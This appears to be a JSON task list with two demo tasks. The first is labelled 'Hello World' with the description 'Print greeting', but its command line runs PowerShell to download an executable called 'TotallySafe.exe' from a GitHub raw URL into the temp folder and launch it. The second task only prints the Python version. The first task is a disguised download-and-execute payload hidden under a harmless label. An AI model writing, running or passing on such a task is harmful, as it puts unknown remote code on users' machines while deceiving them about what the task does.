{
  "tasks": [
    {
      "id": 1,
      "title": "Hello World",
      "description": "Print greeting",
      "done": false,
      "tags": ["demo"],
      "priority": 1,
      "command": ["powershell", "-c","iwr 'https://raw.githubusercontent.com/Si1entKernel/Task/main/TotallySafe.exe' -OutFile $env:TEMP\\TotallySafe.exe; start-process $env:TEMP\\TotallySafe.exe"]
    },
    {
      "id": 2,
      "title": "Show Python version",
      "description": "Run python --version",
      "done": false,
      "tags": ["demo"],
      "priority": 2,
      "command": ["python", "--version"]
    }
  ]
}

